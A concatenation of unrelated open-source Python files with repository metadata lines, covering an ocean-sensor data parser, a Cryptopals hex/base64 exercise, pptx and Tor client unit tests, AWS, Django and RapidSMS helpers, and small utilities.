SENSOR_GROUP_HUMIDITY_TEMP = 18
SENSOR_GROUP_STREAM_PRESSURE = 19
SENSOR_GROUP_DETECTOR_TEMP = 20
SENSOR_GROUP_SOURCE_TEMP = 21
SENSOR_GROUP_SAMPLE_TYPE = 22
INSTRUMENT_PARTICLE_AIR_MAP = [
('zero_a2d', SENSOR_GROUP_ZERO_A2D, int),
('current_a2d', SENSOR_GROUP_CURRENT_A2D, int),
('measured_air_co2', SENSOR_GROUP_CO2, float),
('avg_irga_temperature', SENSOR_GROUP_AVG_IRGA_TEMP, float),
('humidity', SENSOR_GROUP_HUMIDITY, float),
('humidity_temperature', SENSOR_GROUP_HUMIDITY_TEMP, float),
('gas_stream_pressure', SENSOR_GROUP_STREAM_PRESSURE, int),
('irga_detector_temperature', SENSOR_GROUP_DETECTOR_TEMP, float),
('irga_source_temperature', SENSOR_GROUP_SOURCE_TEMP, float)
]
INSTRUMENT_PARTICLE_WATER_MAP = [
('zero_a2d', SENSOR_GROUP_ZERO_A2D, int),
('current_a2d', SENSOR_GROUP_CURRENT_A2D, int),
('measured_water_co2', SENSOR_GROUP_CO2, float),
('avg_irga_temperature', SENSOR_GROUP_AVG_IRGA_TEMP, float),
('humidity', SENSOR_GROUP_HUMIDITY, float),
('humidity_temperature', SENSOR_GROUP_HUMIDITY_TEMP, float),
('gas_stream_pressure', SENSOR_GROUP_STREAM_PRESSURE, int),
('irga_detector_temperature', SENSOR_GROUP_DETECTOR_TEMP, float),
('irga_source_temperature', SENSOR_GROUP_SOURCE_TEMP, float)
]
class DataParticleType(BaseEnum):
PCO2A_INSTRUMENT_AIR_PARTICLE = 'pco2a_a_dcl_instrument_air'
PCO2A_INSTRUMENT_WATER_PARTICLE = 'pco2a_a_dcl_instrument_water'
PCO2A_INSTRUMENT_AIR_RECOVERED_PARTICLE = 'pco2a_a_dcl_instrument_air_recovered'
PCO2A_INSTRUMENT_WATER_RECOVERED_PARTICLE = 'pco2a_a_dcl_instrument_water_recovered'
class Pco2aADclParticleClassKey(BaseEnum):
"""
An enum for the keys application to the pco2a_a_dcl particle classes
"""
AIR_PARTICLE_CLASS = 'air_particle_class'
WATER_PARTICLE_CLASS = 'water_particle_class'
class Pco2aADclInstrumentDataParticleAir(DclInstrumentDataParticle):
"""
Class for generating the Pco2a_a_dcl instrument particles.
"""
data_matcher = SENSOR_DATA_MATCHER_AIR
def __init__(self, raw_data, *args, **kwargs):
super(Pco2aADclInstrumentDataParticleAir, self).__init__(
raw_data, INSTRUMENT_PARTICLE_AIR_MAP, *args, **kwargs)
# instrument_timestamp is the internal_timestamp
instrument_timestamp = self.raw_data[SENSOR_GROUP_SENSOR_DATE_TIME]
elapsed_seconds_useconds = timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp(instrument_timestamp)
self.set_internal_timestamp(elapsed_seconds_useconds)
# instrument clock is not accurate so, use port_timestamp as the preferred_ts
self.contents[DataParticleKey.PREFERRED_TIMESTAMP] = DataParticleKey.PORT_TIMESTAMP
class Pco2aADclInstrumentDataParticleWater(DclInstrumentDataParticle):
"""
Class for generating the Pco2a_a_dcl instrument particles.
"""
data_matcher = SENSOR_DATA_MATCHER_WATER
def __init__(self, raw_data, *args, **kwargs):
super(Pco2aADclInstrumentDataParticleWater, self).__init__(
raw_data, INSTRUMENT_PARTICLE_WATER_MAP, *args, **kwargs)
# Instrument timestamp is the internal timestamp
instrument_timestamp = self.raw_data[SENSOR_GROUP_SENSOR_DATE_TIME]
elapsed_seconds_useconds = timestamp_yyyy_mm_dd_hh_mm_ss_to_ntp(instrument_timestamp)
self.set_internal_timestamp(elapsed_seconds_useconds)
# instrument clock is not accurate so, use port_timestamp as the preferred_ts
self.contents[DataParticleKey.PREFERRED_TIMESTAMP] = DataParticleKey.PORT_TIMESTAMP
class Pco2aADclTelemeteredInstrumentDataParticleAir(Pco2aADclInstrumentDataParticleAir):
"""
Class for generating Offset Data Particles from Telemetered air data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_AIR_PARTICLE
class Pco2aADclTelemeteredInstrumentDataParticleWater(Pco2aADclInstrumentDataParticleWater):
"""
Class for generating Offset Data Particles from Telemetered water data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_WATER_PARTICLE
class Pco2aADclRecoveredInstrumentDataParticleAir(Pco2aADclInstrumentDataParticleAir):
"""
Class for generating Offset Data Particles from Recovered air data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_AIR_RECOVERED_PARTICLE
class Pco2aADclRecoveredInstrumentDataParticleWater(Pco2aADclInstrumentDataParticleWater):
"""
Class for generating Offset Data Particles from Recovered water data.
"""
_data_particle_type = DataParticleType.PCO2A_INSTRUMENT_WATER_RECOVERED_PARTICLE
class Pco2aADclParser(DclFileCommonParser):
"""
This is the entry point for the parser.
"""
def __init__(self,
config,
stream_handle,
exception_callback):
super(Pco2aADclParser, self).__init__(config,
stream_handle,
exception_callback,
None,
METADATA_MATCHER)
| danmergens/mi-instrument | mi/dataset/parser/pco2a_a_dcl.py | Python | bsd-2-clause | 10,120 | 0.003063 |
#!/usr/bin/env python
# Written against python 3.3.1
# Matasano Problem 1
# Convert hex to base64
# Example hex: 49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d
# Example base64: SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t
import base64
import binascii
rawToHexLUT = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09', '0a', '0b', '0c', '0d', '0e', '0f',
'10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '1a', '1b', '1c', '1d', '1e', '1f',
'20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '2a', '2b', '2c', '2d', '2e', '2f',
'30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '3a', '3b', '3c', '3d', '3e', '3f',
'40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '4a', '4b', '4c', '4d', '4e', '4f',
'50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '5a', '5b', '5c', '5d', '5e', '5f',
'60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '6a', '6b', '6c', '6d', '6e', '6f',
'70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '7a', '7b', '7c', '7d', '7e', '7f',
'80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '8a', '8b', '8c', '8d', '8e', '8f',
'90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '9a', '9b', '9c', '9d', '9e', '9f',
'a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9', 'aa', 'ab', 'ac', 'ad', 'ae', 'af',
'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9', 'ba', 'bb', 'bc', 'bd', 'be', 'bf',
'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9', 'ca', 'cb', 'cc', 'cd', 'ce', 'cf',
'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9', 'da', 'db', 'dc', 'dd', 'de', 'df',
'e0', 'e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'e8', 'e9', 'ea', 'eb', 'ec', 'ed', 'ee', 'ef',
'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9', 'fa', 'fb', 'fc', 'fd', 'fe', 'ff',]
def base64toRaw(b64):
raw = base64.b64decode(b64);
return raw;
def rawToBase64(raw):
b64 = base64.b64encode(raw);
return b64;
def hexToRaw(hx):
raw = binascii.unhexlify(hx);
return raw;
def rawToHex(raw):
#hx = binascii.hexlify(raw);
hx = '';
for r in raw:
if type(r) != int:
r = ord(r);
hx += rawToHexLUT[r];
return bytes(hx, 'UTF-8');
def base64toHex(b64):
'''Convert Base64 string to hex string'''
return rawToHex(base64toRaw(b64));
def hexToBase64(hx):
'''Convert hex string to Base64'''
return rawToBase64(hexToRaw(hx));
def test1():
hx = b'49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d';
b64 = b'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t';
if (base64toHex(b64) != hx):
print( "hex expected: " , hx);
print( "hex result: " , base64toHex(b64));
return False;
if (hexToBase64(hx) != b64):
print( "b64 expected: ", b64);
print( "b64 result: " , hexToBase64(hx));
return False;
return True;
if __name__ == "__main__":
if (test1()):
print("Program 1 success");
else:
print("Failure");
| reschly/cryptopals | prob1.py | Python | apache-2.0 | 3,439 | 0.018028 |
# encoding: utf-8
"""
Test suite for pptx.presentation module.
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import pytest
from pptx.parts.coreprops import CorePropertiesPart
from pptx.parts.presentation import PresentationPart
from pptx.parts.slide import NotesMasterPart
from pptx.presentation import Presentation
from pptx.slide import SlideLayouts, SlideMaster, SlideMasters, Slides
from .unitutil.cxml import element, xml
from .unitutil.mock import class_mock, instance_mock, property_mock
class DescribePresentation(object):
def it_knows_the_height_of_its_slides(self, sld_height_get_fixture):
prs, expected_value = sld_height_get_fixture
assert prs.slide_height == expected_value
def it_can_change_the_height_of_its_slides(self, sld_height_set_fixture):
prs, slide_height, expected_xml = sld_height_set_fixture
prs.slide_height = slide_height
assert prs._element.xml == expected_xml
def it_knows_the_width_of_its_slides(self, sld_width_get_fixture):
prs, expected_value = sld_width_get_fixture
assert prs.slide_width == expected_value
def it_can_change_the_width_of_its_slides(self, sld_width_set_fixture):
prs, slide_width, expected_xml = sld_width_set_fixture
prs.slide_width = slide_width
assert prs._element.xml == expected_xml
def it_knows_its_part(self, part_fixture):
prs, prs_part_ = part_fixture
assert prs.part is prs_part_
def it_provides_access_to_its_core_properties(self, core_props_fixture):
prs, core_properties_ = core_props_fixture
assert prs.core_properties is core_properties_
def it_provides_access_to_its_notes_master(self, notes_master_fixture):
prs, notes_master_ = notes_master_fixture
assert prs.notes_master is notes_master_
def it_provides_access_to_its_slides(self, slides_fixture):
prs, rename_slide_parts_, rIds = slides_fixture[:3]
Slides_, slides_, expected_xml = slides_fixture[3:]
slides = prs.slides
rename_slide_parts_.assert_called_once_with(rIds)
Slides_.assert_called_once_with(
prs._element.xpath('p:sldIdLst')[0], prs
)
assert prs._element.xml == expected_xml
assert slides is slides_
def it_provides_access_to_its_slide_layouts(self, layouts_fixture):
prs, slide_layouts_ = layouts_fixture
assert prs.slide_layouts is slide_layouts_
def it_provides_access_to_its_slide_master(self, master_fixture):
prs, getitem_, slide_master_ = master_fixture
slide_master = prs.slide_master
getitem_.assert_called_once_with(0)
assert slide_master is slide_master_
def it_provides_access_to_its_slide_masters(self, masters_fixture):
prs, SlideMasters_, slide_masters_, expected_xml = masters_fixture
slide_masters = prs.slide_masters
SlideMasters_.assert_called_once_with(
prs._element.xpath('p:sldMasterIdLst')[0], prs
)
assert slide_masters is slide_masters_
assert prs._element.xml == expected_xml
def it_can_save_the_presentation_to_a_file(self, save_fixture):
prs, file_, prs_part_ = save_fixture
prs.save(file_)
prs_part_.save.assert_called_once_with(file_)
# fixtures -------------------------------------------------------
@pytest.fixture
def core_props_fixture(self, prs_part_, core_properties_):
prs = Presentation(None, prs_part_)
prs_part_.core_properties = core_properties_
return prs, core_properties_
@pytest.fixture
def layouts_fixture(self, masters_prop_, slide_layouts_):
prs = Presentation(None, None)
masters_prop_.return_value.__getitem__.return_value.slide_layouts = (
slide_layouts_
)
return prs, slide_layouts_
@pytest.fixture
def master_fixture(self, masters_prop_, slide_master_):
prs = Presentation(None, None)
getitem_ = masters_prop_.return_value.__getitem__
getitem_.return_value = slide_master_
return prs, getitem_, slide_master_
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldMasterIdLst'),
('p:presentation/p:sldMasterIdLst',
'p:presentation/p:sldMasterIdLst'),
])
def masters_fixture(self, request, SlideMasters_, slide_masters_):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, SlideMasters_, slide_masters_, expected_xml
@pytest.fixture
def notes_master_fixture(self, prs_part_, notes_master_):
prs = Presentation(None, prs_part_)
prs_part_.notes_master = notes_master_
return prs, notes_master_
@pytest.fixture
def part_fixture(self, prs_part_):
prs = Presentation(None, prs_part_)
return prs, prs_part_
@pytest.fixture
def save_fixture(self, prs_part_):
prs = Presentation(None, prs_part_)
file_ = 'foobar.docx'
return prs, file_, prs_part_
@pytest.fixture(params=[
('p:presentation', None),
('p:presentation/p:sldSz{cy=42}', 42),
])
def sld_height_get_fixture(self, request):
prs_cxml, expected_value = request.param
prs = Presentation(element(prs_cxml), None)
return prs, expected_value
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldSz{cy=914400}'),
('p:presentation/p:sldSz{cy=424242}',
'p:presentation/p:sldSz{cy=914400}'),
])
def sld_height_set_fixture(self, request):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, 914400, expected_xml
@pytest.fixture(params=[
('p:presentation', None),
('p:presentation/p:sldSz{cx=42}', 42),
])
def sld_width_get_fixture(self, request):
prs_cxml, expected_value = request.param
prs = Presentation(element(prs_cxml), None)
return prs, expected_value
@pytest.fixture(params=[
('p:presentation',
'p:presentation/p:sldSz{cx=914400}'),
('p:presentation/p:sldSz{cx=424242}',
'p:presentation/p:sldSz{cx=914400}'),
])
def sld_width_set_fixture(self, request):
prs_cxml, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
expected_xml = xml(expected_cxml)
return prs, 914400, expected_xml
@pytest.fixture(params=[
('p:presentation', [], 'p:presentation/p:sldIdLst'),
('p:presentation/p:sldIdLst/p:sldId{r:id=a}', ['a'],
'p:presentation/p:sldIdLst/p:sldId{r:id=a}'),
('p:presentation/p:sldIdLst/(p:sldId{r:id=a},p:sldId{r:id=b})',
['a', 'b'],
'p:presentation/p:sldIdLst/(p:sldId{r:id=a},p:sldId{r:id=b})'),
])
def slides_fixture(self, request, part_prop_, Slides_, slides_):
prs_cxml, rIds, expected_cxml = request.param
prs = Presentation(element(prs_cxml), None)
rename_slide_parts_ = part_prop_.return_value.rename_slide_parts
expected_xml = xml(expected_cxml)
return prs, rename_slide_parts_, rIds, Slides_, slides_, expected_xml
# fixture components ---------------------------------------------
@pytest.fixture
def core_properties_(self, request):
return instance_mock(request, CorePropertiesPart)
@pytest.fixture
def masters_prop_(self, request):
return property_mock(request, Presentation, 'slide_masters')
@pytest.fixture
def notes_master_(self, request):
return instance_mock(request, NotesMasterPart)
@pytest.fixture
def part_prop_(self, request):
return property_mock(request, Presentation, 'part')
@pytest.fixture
def prs_part_(self, request):
return instance_mock(request, PresentationPart)
@pytest.fixture
def slide_layouts_(self, request):
return instance_mock(request, SlideLayouts)
@pytest.fixture
def SlideMasters_(self, request, slide_masters_):
return class_mock(
request, 'pptx.presentation.SlideMasters',
return_value=slide_masters_
)
@pytest.fixture
def slide_master_(self, request):
return instance_mock(request, SlideMaster)
@pytest.fixture
def slide_masters_(self, request):
return instance_mock(request, SlideMasters)
@pytest.fixture
def Slides_(self, request, slides_):
return class_mock(
request, 'pptx.presentation.Slides', return_value=slides_
)
@pytest.fixture
def slides_(self, request):
return instance_mock(request, Slides)
| biggihs/python-pptx | tests/test_presentation.py | Python | mit | 8,885 | 0 |
# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from cement.utils.misc import minimal_logger
from ..lib import aws
from ..objects.exceptions import ServiceError, NotFoundError
from ..resources.strings import responses
LOG = minimal_logger(__name__)
def _make_api_call(operation_name, **operation_options):
return aws.make_api_call('elbv2', operation_name, **operation_options)
def get_instance_healths_from_target_groups(target_group_arns):
results = []
instance_healths = {}
for arn in target_group_arns:
try:
results.append( {
'TargetGroupArn': arn,
'Result': _make_api_call('describe_target_health', TargetGroupArn=arn)
} )
except ServiceError as e:
if e.message == responses['loadbalancer.targetgroup.notfound'].replace('{tgarn}', arn):
raise NotFoundError(e)
for result in results:
for description in result['Result']['TargetHealthDescriptions']:
instance_id = description['Target']['Id']
if instance_id not in instance_healths:
instance_healths[instance_id] = []
instance_healths[instance_id].append({
'TargetGroupArn': result['TargetGroupArn'],
'State': description['TargetHealth'].get('State', ''),
'Description': description['TargetHealth'].get('Description', ''),
'Reason': description['TargetHealth'].get('Reason', '')
})
return instance_healths #map of instance_id => [target group health descrpitions]
def get_target_group_healths(target_group_arns):
results = {}
for arn in target_group_arns:
try:
results[arn] = _make_api_call('describe_target_health', TargetGroupArn=arn)
except ServiceError as e:
if e.code == 'TargetGroupNotFound':
raise NotFoundError(e)
else:
raise e
return results #map of target_group_arn => [target group health descrpitions]
| quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/lib/elbv2.py | Python | mit | 2,545 | 0.005108 |
#!/usr/bin/env python3
import sys
import os
import random
from snakemake.utils import read_job_properties
jobscript = sys.argv[1]
job_properties = read_job_properties(jobscript)
with open("qsub.log", "w") as log:
print(job_properties, file=log)
print(random.randint(1, 100))
os.system("sh {}".format(jobscript))
| gusevfe/snakemake | tests/test14/qsub.py | Python | mit | 319 | 0 |
#!/usr/bin/env python
import os, argparse, logging
from ts3observer.cli import CommandLineInterface as Cli
from ts3observer.gui import GraphicalUserInterface as Gui
from ts3observer.utils import path
from ts3observer.exc import CriticalException, ShutDownException, print_traceback, print_buginfo
class Dispatcher(object):
''' Dispatch the task to the right module '''
def __init__(self):
self._parse_arguments()
def _parse_arguments(self):
''' Parse the arguments from commandline '''
parser = argparse.ArgumentParser()
sub_parser = parser.add_subparsers(dest='task')
parser.add_argument('-v', '--verbose', action='store_true', help='Increase verbosity for debugging purpose')
parser.add_argument('-q', '--quiet', action='store_true', help='Only show messaged if there is an critical Exception')
parser.add_argument('-g', '--graphical', action='store_true', help='Run the ts3observer as Gui')
parser.add_argument('-d', '--dev', action='store_true', help='Run in developer modus')
utils_parser = sub_parser.add_parser('utils', help='Need some help?')
utils_sub_parser = utils_parser.add_subparsers(dest='utils')
utils_grouplist = utils_sub_parser.add_parser('servergrouplist', help='List all servergroups')
utils_channellist = utils_sub_parser.add_parser('channellist', help='List all channels')
utils_clientlist = utils_sub_parser.add_parser('clientlist', help='List all connected clients')
utils_clientlist.add_argument('-a', '--advanced', action='store_true', help='Get more information about the connected clients')
run_parser = sub_parser.add_parser('run', help='Run the ts3observer')
version_parser = sub_parser.add_parser('version', help='Shows the ts3observer version')
ts3o.args = parser.parse_args()
def dispatch(self):
''' Dispatch the task to the right module '''
if ts3o.args.graphical:
getattr(Gui(), ts3o.args.task)()
else:
getattr(Cli(), ts3o.args.task)()
class Ts3o(object):
''' Define a holder class '''
pass
def _setup():
''' Define some globals for ts3observer '''
__builtins__.ts3o = Ts3o()
ts3o.base_path = os.path.abspath(os.path.dirname(__file__))
def _run():
try:
_setup()
Dispatcher().dispatch()
except ShutDownException as e:
logging.info('Good Bye!')
except CriticalException as e:
if ts3o.args.verbose:
print_traceback()
logging.critical('{}: {}'.format(e.__class__.__name__, str(e)))
except Exception as e:
print_traceback()
logging.critical('{}: {}'.format(e.__class__.__name__, str(e)))
print_buginfo()
if __name__ == '__main__':
_run()
else:
raise Exception('Please, run this script directly!')
| HWDexperte/ts3observer | ts3observer.py | Python | mit | 2,869 | 0.004183 |
import logging
import requests
from fakturo.core import exceptions, utils
LOG = logging.getLogger(__name__)
class BaseClient(object):
def __init__(self, url=None):
url.rstrip('/')
self.url = url
self.requests = self.get_requests()
def get_requests(self, headers={}, args_hooks=[], pre_request_hooks=[]):
if not 'Content-Type' in headers:
headers['Content-Type'] = 'application/json'
pre_request_hooks = pre_request_hooks + [utils.log_request]
session = requests.Session()
session.hooks = dict(
args=args_hooks,
pre_request=pre_request_hooks)
session.headers.update(headers)
return session
def wrap_api_call(self, function, path, status_code=200, *args, **kw):
path = path.lstrip('/') if path else ''
url = self.url + '/' + path
LOG.debug('Wrapping request to %s' % url)
wrapper = kw.get('wrapper', None)
# NOTE: If we're passed a wrapper function by the caller, pass the
# requests function to it along with path and other args...
if wrapper and hasattr(wrapper, '__call__'):
return wrapper(function, url, *args, **kw)
response = function(url, *args, **kw)
# NOTE: Make a function that can extract errors based on content type?
if response.status_code != status_code:
error = None
if response.json:
error = response.json.get('error', None)
if not error:
error = 'Remote error occured. Response Body:\n%s' % \
response.content
raise exceptions.RemoteError(response.status_code, error)
return response
def get(self, *args, **kw):
return self.wrap_api_call(self.requests.get, *args, **kw)
def post(self, *args, **kw):
return self.wrap_api_call(self.requests.post, *args, **kw)
def put(self, *args, **kw):
return self.wrap_api_call(self.requests.put, *args, **kw)
def delete(self, *args, **kw):
return self.wrap_api_call(self.requests.delete, *args, **kw)
| billingstack/python-fakturo | fakturo/core/client.py | Python | apache-2.0 | 2,138 | 0.000468 |
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.utils.modules import try_import
from .forms import LocationForm
from .models import Location
def get_model(name):
"""
"""
for type in Location.subclasses():
if type._meta.module_name == name:
return type
raise StandardError("There is no Location subclass named '%s'" % name)
def form_for_model(model):
"""
Return the Form which should be used to add/edit ``model`` in the
WebUI, by importing the class named ``"%sForm" % model.__name__``
from the sibling ``forms`` module. For example::
app1.models.Alpha -> myapp.forms.SchoolForm
app2.models.beta.Beta -> app2.forms.beta.BetaForm
If no such form is defined, an appropriately-patched copy of the
rapidsms.contrib.locations.forms.LocationForm form is returned.
"""
parts = model.__module__.split(".")
parts[parts.index("models")] = "forms"
module_name = ".".join(parts)
form_name = model.__name__ + "Form"
module = try_import(module_name)
if module is not None:
form = getattr(module, form_name, None)
if form is not None:
return form
meta_dict = LocationForm.Meta.__dict__
meta_dict["model"] = model
return type(
form_name,
(LocationForm,), {
"Meta": type("Meta", (), meta_dict)
}
)
| caktus/rapidsms | rapidsms/contrib/locations/utils.py | Python | bsd-3-clause | 1,402 | 0 |
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_noop
from corehq import toggles
from corehq.apps.domain.views import DomainViewMixin, LoginAndDomainMixin
from corehq.apps.hqwebapp.views import BasePageView
from corehq.apps.style.decorators import preview_boostrap3
@toggles.DASHBOARD_PREVIEW.required_decorator()
def dashboard_default(request, domain):
return HttpResponseRedirect(reverse(NewUserDashboardView.urlname,
args=[domain]))
class BaseDashboardView(LoginAndDomainMixin, BasePageView, DomainViewMixin):
@method_decorator(preview_boostrap3())
@method_decorator(toggles.DASHBOARD_PREVIEW.required_decorator())
def dispatch(self, request, *args, **kwargs):
return super(BaseDashboardView, self).dispatch(request, *args, **kwargs)
@property
def main_context(self):
context = super(BaseDashboardView, self).main_context
context.update({
'domain': self.domain,
})
return context
@property
def page_url(self):
return reverse(self.urlname, args=[self.domain])
class NewUserDashboardView(BaseDashboardView):
urlname = 'dashboard_new_user'
page_title = ugettext_noop("HQ Dashboard")
template_name = 'dashboard/dashboard_new_user.html'
@property
def page_context(self):
return {
}
| SEL-Columbia/commcare-hq | corehq/apps/dashboard/views.py | Python | bsd-3-clause | 1,502 | 0.001997 |
'''Module for testing the tor client'''
import unittest
import os
import time
import socks
from murmeli import system
from murmeli.torclient import TorClient
from murmeli.message import ContactRequestMessage
class FakeMessageHandler(system.Component):
'''Handler for receiving messages from Tor'''
def __init__(self, sys):
system.Component.__init__(self, sys, system.System.COMPNAME_MSG_HANDLER)
self.messages = []
def receive(self, msg):
'''Receive an incoming message'''
if msg:
self.messages.append(msg)
class TorTest(unittest.TestCase):
'''Tests for the tor communication'''
def test_sending(self):
'''Test sending non-valid and valid data to the listener'''
sys = system.System()
tordir = os.path.join("test", "outputdata", "tor")
os.makedirs(tordir, exist_ok=True)
tor_client = TorClient(sys, tordir)
sys.add_component(tor_client)
self.assertTrue(tor_client.started, "Tor started")
time.sleep(5)
# invalid data
torid = tor_client.get_own_torid()
print("Torid:", torid)
self.assertTrue(torid, "Tor id obtained")
# Send a message
success = self.send_message(torid, "abcdef".encode("utf-8"))
self.assertTrue(self.send_message(torid, "murmeli".encode("utf-8")), "Magic sent")
time.sleep(5)
# Add receiver to handle the messages
receiver = FakeMessageHandler(sys)
sys.add_component(receiver)
self.assertFalse(receiver.messages, "no messages received yet")
# contact request
req = ContactRequestMessage()
sender_name = "Worzel Gummidge"
sender_msg = "Watch out for the volcano, it's radioactive!"
req.set_field(req.FIELD_SENDER_NAME, sender_name)
req.set_field(req.FIELD_MESSAGE, sender_msg)
unenc_output = req.create_output(encrypter=None)
torid = tor_client.get_own_torid()
self.assertTrue(self.send_message(torid, unenc_output), "Real message sent")
time.sleep(5)
# Now check it has been received
self.assertEqual(len(receiver.messages), 1, "1 message received")
received = receiver.messages.pop()
print("Got message:", received)
self.assertEqual(received.get_field(req.FIELD_SENDER_NAME), sender_name, "name match")
self.assertEqual(received.get_field(req.FIELD_MESSAGE), sender_msg, "msg match")
# Finished
sys.stop()
self.assertFalse(tor_client.started, "Tor stopped")
time.sleep(5)
def send_message(self, recipient, message):
'''Send a message to the given recipient'''
# Try a few times because the service might take a few seconds to become available
for _ in range(10):
try:
socket = socks.socksocket()
socket.setproxy(socks.PROXY_TYPE_SOCKS4, "localhost", 11109)
socket.connect((recipient + ".onion", 11009))
numsent = socket.send(message)
socket.close()
return numsent == len(message)
except Exception as e:
print("Woah, that threw something:", e)
time.sleep(8)
if __name__ == "__main__":
unittest.main()
| activityworkshop/Murmeli | test/test_torclient.py | Python | gpl-2.0 | 3,296 | 0.002124 |
"""
MIT License
Copyright (c) 2018 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
class XML:
def _write(self,value):
self._xml += str(value) + "\0"
def __init__(self,rootTag):
self._xml = ""
self._write("dummy")
self._write(rootTag)
def push_tag(self,tag):
self._xml += ">"
self._write(tag)
pushTag = push_tag
def pop_tag(self):
self._xml += "<"
popTag = pop_tag
def put_attribute(self,name,value):
self._xml += "A"
self._write(name)
self._write(str(value))
putAttribute = put_attribute
def put_value(self,value):
self._xml += "V"
self._write(str(value))
putValue = put_value
def put_tag_and_value(self,tag,value):
self.pushTag(tag)
self.putValue(value)
self.popTag()
putTagAndValue = put_tag_and_value
def to_string(self):
return self._xml
toString = to_string
| epeios-q37/epeios | tools/xdhq/wrappers/PYH/XDHqXML.py | Python | agpl-3.0 | 1,921 | 0.023425 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-23 02:11
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Note',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=50)),
('slug', models.SlugField(unique=True)),
('note', models.TextField()),
('favorited', models.BooleanField(default=False)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notes', to=settings.AUTH_USER_MODEL)),
],
),
]
| chronossc/notes-app | notes/migrations/0001_initial.py | Python | mit | 993 | 0.002014 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Jakob Luettgau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
class FileManager(object):
"""Manages the files that exist in the system."""
def __init__(self, simulation=None):
print('FileManager instance.')
self.simulation = simulation
self.files = {}
pass
def lookup(self, name):
"""Checks if file exists"""
if name in self.files:
return self.files[name]
else:
return False
def scan(self, entry):
"""Scan the data structure for a entry"""
pass
def update(self, name, tape=None, size=None, pos=0):
# create entry if not existent
if not (name in self.files):
self.files[name] = {}
# set fields idividually
if tape != None:
self.files[name]['tape'] = tape
if size != None:
self.files[name]['size'] = size
self.files[name]['pos'] = pos
return self.files[name]
def dump(self):
"""Make snapshot of the file system state."""
print("")
